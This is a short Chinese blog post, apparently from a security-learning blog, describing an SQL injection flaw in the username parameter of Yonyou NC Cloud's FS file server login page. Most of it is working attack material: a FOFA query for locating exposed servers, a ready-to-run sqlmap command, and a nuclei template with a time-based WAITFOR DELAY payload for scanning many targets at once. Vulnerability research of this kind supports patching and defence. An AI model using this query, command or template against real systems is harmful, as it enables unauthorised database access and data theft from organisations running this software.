用友NC Cloud FS文件服务器SQL注入

漏洞描述

用友 NCCloud FS文件管理登录页面对用户名参数没有过滤,存在SQL注入。

漏洞影响

用友NC Cloud且存在FS文件服务器配置管理登录页面。

漏洞复现

fofa语法:app="用友-NC-Cloud" && icon_hash="1596996317"
用友NC Cloud登录页面如下:

在应用中存在文件服务器管理登录页面
http://xxx.xxx.xxx.xxx/fs/

拦截文件服务器页面的登录请求数据包,然后直接sqlmap梭哈。
sqlmap -u "http://IP:PORT/fs/console?username=admin&password=%2Bz3VgEDJpVuEHdRPPzbCFTCa9Q0sKLOZ5q4ZLhxjuok%3D" --batch -p username

nuclei批量yaml文件

id: yonyou_NCCloud_FS_sqli

info:
  name: 用友 NCCloud FS文件管理SQL注入
  author: mczilong
  severity: critical
  tags: yonyou 
  description: fofa   "NCCloud"
requests:
  - raw:
      - |
        @timeout: 15s
        GET /fs/console?username=222%27;WAITFOR%20DELAY%20%270:0:8%27--&password=WiEZoxowjDhBk7bfE9nvzP3TjiK/RivMT1jKxrq42bI HTTP/1.1
        Host: {{Hostname}}        

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'duration>=8'
posted @ 2023-09-07 15:46  学安全的小白  阅读(891)  评论(0编辑  收藏  举报